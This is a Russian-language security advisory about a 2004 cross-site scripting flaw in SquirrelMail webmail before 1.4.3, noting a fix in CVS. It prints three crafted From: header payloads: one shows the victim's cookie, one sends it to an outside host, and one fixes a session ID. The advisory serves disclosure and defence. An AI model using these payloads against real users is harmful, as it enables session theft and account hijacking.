Security Lab

Межсайтовый скриптинг в SquirrelMail

Дата публикации:31.05.2004
Всего просмотров:1261
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: SquirrelMail до версии 1.4.3; 1.5.1

Описание: Уязвимость обнаружена в SquirrelMail. Удаленный пользователь может выполнить XSS нападение.

Удаленный пользователь может послать специально сформированное email сообщение к целевому пользователю, чтобы выполнить произвольный код сценария в браузере пользователя, просматривающего злонамеренное сообщение. Пример:

From:<!--<>(-->John Doe<script>window.alert(document.cookie);</scrip t><>

From:(<!--(--><script>document.location='http://www.rs-labs.com/?'+document.cookie;</script><>

From:<!--<>(-->John Doe<script>document.cookie='PHPSESSID=xxx; path=/';</script><>

URL производителя: http://www.squirrelmail.org/

Решение:Исправление доступно через CVS.

Ссылки: EnderUNIX Security Anouncement (Isoqlog and Spamguard)